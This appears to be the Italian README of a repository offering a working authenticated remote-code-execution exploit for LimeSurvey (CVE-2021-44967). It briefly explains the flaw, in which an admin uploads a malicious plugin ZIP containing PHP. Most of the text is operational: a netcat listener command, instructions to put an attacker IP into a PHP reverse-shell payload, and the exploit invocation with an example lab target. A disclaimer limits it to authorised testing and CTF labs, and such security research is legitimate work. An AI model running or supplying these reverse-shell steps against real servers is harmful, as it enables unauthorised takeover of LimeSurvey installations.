
🔥 Exploit RCE automatizzato per Limesurvey (CVE-2021-44967). Catena di sfruttamento ottimizzata per l'escalation dei privilegi. 🚀
Questo repository contiene un exploit funzionante per CVE-2021-44967, una vulnerabilità di Esecuzione Remota di Codice autenticata in LimeSurvey.
Testato e confermato funzionante su:
La vulnerabilità consente a un utente autenticato con privilegi amministrativi di caricare un plugin malevolo. Poiché LimeSurvey non valida rigorosamente il contenuto del plugin ZIP né impedisce l'esecuzione di file PHP nella directory dei plugin, un attaccante può ottenere RCE accedendo direttamente alla shell caricata.
config.xml aggiornato per la compatibilità con LimeSurvey versioni 3.0 fino a 6.0.Avvia un listener netcat sulla tua macchina:
nc -lvnp 443
Modifica php-rev.php e imposta il tuo IP locale e la porta:
$ip = '<YOUR_IP>';
$port = 443;
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>
Esempio:
python3 exploit.py http://10.129.1.243/survey admin test
exploit.py: Lo script principale di automazione.php-rev.php: Payload della reverse shell PHP.config.xml: File di configurazione obbligatorio del plugin LimeSurvey.Questo strumento è destinato esclusivamente a scopi educativi e test di sicurezza autorizzati. È strettamente inteso per l'uso in ambienti controllati e legali (es. CTF, laboratori o test autorizzati). L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Usalo in modo responsabile e solo su sistemi per cui hai esplicita autorizzazione.